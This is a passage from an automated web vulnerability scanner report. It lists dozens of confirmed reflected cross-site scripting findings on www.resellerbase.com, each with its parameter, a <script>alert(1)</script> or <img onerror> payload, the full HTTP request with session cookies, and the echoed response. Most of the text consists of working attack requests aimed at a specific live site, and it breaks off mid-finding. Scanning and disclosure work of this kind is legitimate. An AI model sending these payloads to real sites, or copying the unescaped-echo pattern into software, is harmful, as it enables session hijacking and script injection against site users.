This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag98efb<script>alert(1)</script>a3113a118e4/white+label HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag98efb<script>alert(1)</script>a3113a118e4/white+label was not found on this server.</p>
...[SNIP]...

2.4688. http://www.resellerbase.com/tag/white+label [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/white+label

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84f1c<script>alert(1)</script>72f921e512b64a7b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag84f1c<script>alert(1)</script>72f921e512b64a7b5/white+label?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/white+label
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag84f1c<script>alert(1)</script>72f921e512b64a7b5/white+label?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4689. http://www.resellerbase.com/tag/white+label [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/white+label

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload a26ff</title><img%20src%3da%20onerror%3dalert(1)>d8a81842b87a9a45b was submitted in the REST URL parameter 2. This input was echoed as a26ff</title><img src=a onerror=alert(1)>d8a81842b87a9a45b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/white+labela26ff</title><img%20src%3da%20onerror%3dalert(1)>d8a81842b87a9a45b?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/white+label
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: white labela26ff</title><img src=a onerror=alert(1)>d8a81842b87a9a45b</title>
...[SNIP]...

2.4690. http://www.resellerbase.com/tag/white+label [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/white+label

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 45540<img%20src%3da%20onerror%3dalert(1)>d02643264bf was submitted in the REST URL parameter 2. This input was echoed as 45540<img src=a onerror=alert(1)>d02643264bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/white+label45540<img%20src%3da%20onerror%3dalert(1)>d02643264bf HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: white
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : white label45540<img src=a onerror=alert(1)>d02643264bf]</td>
...[SNIP]...

2.4691. http://www.resellerbase.com/tag/white+label [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/white+label

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 38e8f<img%20src%3da%20onerror%3dalert(1)>9529f3a70e1a96ce6 was submitted in the REST URL parameter 2. This input was echoed as 38e8f<img src=a onerror=alert(1)>9529f3a70e1a96ce6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/white+label38e8f<img%20src%3da%20onerror%3dalert(1)>9529f3a70e1a96ce6?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/white+label
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: white
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : white label38e8f<img src=a onerror=alert(1)>9529f3a70e1a96ce6]</td>
...[SNIP]...

2.4692. http://www.resellerbase.com/tag/white+label [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/white+label

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 67325</title><img%20src%3da%20onerror%3dalert(1)>48c81d53ebd was submitted in the REST URL parameter 2. This input was echoed as 67325</title><img src=a onerror=alert(1)>48c81d53ebd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/white+label67325</title><img%20src%3da%20onerror%3dalert(1)>48c81d53ebd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: white label67325</title><img src=a onerror=alert(1)>48c81d53ebd</title>
...[SNIP]...

2.4693. http://www.resellerbase.com/tags.php [<r parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php

Issue detail

The value of the &ltr request parameter is copied into the HTML document as plain text between tags. The payload f3665<img%20src%3da%20onerror%3dalert(1)>ede49067044 was submitted in the &ltr parameter. This input was echoed as f3665<img src=a onerror=alert(1)>ede49067044 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tags.php?&ltr=f3665<img%20src%3da%20onerror%3dalert(1)>ede49067044 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:27:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tag Clouds [f3665<im
...[SNIP]...
<b>Tag Clouds [F3665<IMG SRC=A ONERROR=ALERT(1)>EDE49067044]</b>
...[SNIP]...

2.4694. http://www.resellerbase.com/tags.php [<r parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php

Issue detail

The value of the &ltr request parameter is copied into the HTML document as text between TITLE tags. The payload 37f32</title><img%20src%3da%20onerror%3dalert(1)>ba9e9ab8db8 was submitted in the &ltr parameter. This input was echoed as 37f32</title><img src=a onerror=alert(1)>ba9e9ab8db8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tags.php?&ltr=37f32</title><img%20src%3da%20onerror%3dalert(1)>ba9e9ab8db8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:27:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tag Clouds [37f32</title><img src=a onerror=alert(1)>ba9e9ab8db8]</title>
...[SNIP]...

2.4695. http://www.resellerbase.com/tags.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d6917<script>alert(1)</script>388affacfd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpd6917<script>alert(1)</script>388affacfd6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpd6917<script>alert(1)</script>388affacfd6 was not found on this server.</p>
...[SNIP]...

2.4696. http://www.resellerbase.com/tags.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91caa"><script>alert(1)</script>a2491f7ccf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php?91caa"><script>alert(1)</script>a2491f7ccf1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:27:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 12222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tag Clouds [ALL]</ti
...[SNIP]...
<a href="/tags.php?91caa"><script>alert(1)</script>a2491f7ccf1=1&ltr=%23">
...[SNIP]...

2.4697. http://www.resellerbase.com/tags.php<r=# [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=#

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2559f<script>alert(1)</script>9fcbaa50d47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php2559f<script>alert(1)</script>9fcbaa50d47&ltr=# HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php2559f<script>alert(1)</script>9fcbaa50d47&ltr=# was not found on this server.</p>
...[SNIP]...

2.4698. http://www.resellerbase.com/tags.php<r=# [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=#

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f2385<script>alert(1)</script>e04aded429b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=#?f2385<script>alert(1)</script>e04aded429b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=#?f2385<script>alert(1)</script>e04aded429b=1 was not found on this server.</p>
...[SNIP]...

2.4699. http://www.resellerbase.com/tags.php<r=A [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=A

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fa4c9<script>alert(1)</script>b81e8f86675 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpfa4c9<script>alert(1)</script>b81e8f86675&ltr=A HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpfa4c9<script>alert(1)</script>b81e8f86675&ltr=A was not found on this server.</p>
...[SNIP]...

2.4700. http://www.resellerbase.com/tags.php<r=A [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=A

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6765c<script>alert(1)</script>a8321ed6fc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=A?6765c<script>alert(1)</script>a8321ed6fc0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=A?6765c<script>alert(1)</script>a8321ed6fc0=1 was not found on this server.</p>
...[SNIP]...

2.4701. http://www.resellerbase.com/tags.php<r=B [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=B

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c815d<script>alert(1)</script>6593a311685 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpc815d<script>alert(1)</script>6593a311685&ltr=B HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpc815d<script>alert(1)</script>6593a311685&ltr=B was not found on this server.</p>
...[SNIP]...

2.4702. http://www.resellerbase.com/tags.php<r=B [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=B

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2dd95<script>alert(1)</script>ad1dd1f2b99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=B?2dd95<script>alert(1)</script>ad1dd1f2b99=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=B?2dd95<script>alert(1)</script>ad1dd1f2b99=1 was not found on this server.</p>
...[SNIP]...

2.4703. http://www.resellerbase.com/tags.php<r=C [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=C

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e637b<script>alert(1)</script>e2257fea742 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpe637b<script>alert(1)</script>e2257fea742&ltr=C HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpe637b<script>alert(1)</script>e2257fea742&ltr=C was not found on this server.</p>
...[SNIP]...

2.4704. http://www.resellerbase.com/tags.php<r=C [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=C

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 47e9b<script>alert(1)</script>cdff05ff1a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=C?47e9b<script>alert(1)</script>cdff05ff1a7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=C?47e9b<script>alert(1)</script>cdff05ff1a7=1 was not found on this server.</p>
...[SNIP]...

2.4705. http://www.resellerbase.com/tags.php<r=D [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=D

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d135c<script>alert(1)</script>13428607a9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpd135c<script>alert(1)</script>13428607a9e&ltr=D HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpd135c<script>alert(1)</script>13428607a9e&ltr=D was not found on this server.</p>
...[SNIP]...

2.4706. http://www.resellerbase.com/tags.php<r=D [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tags.php&ltr=D

Issue detail

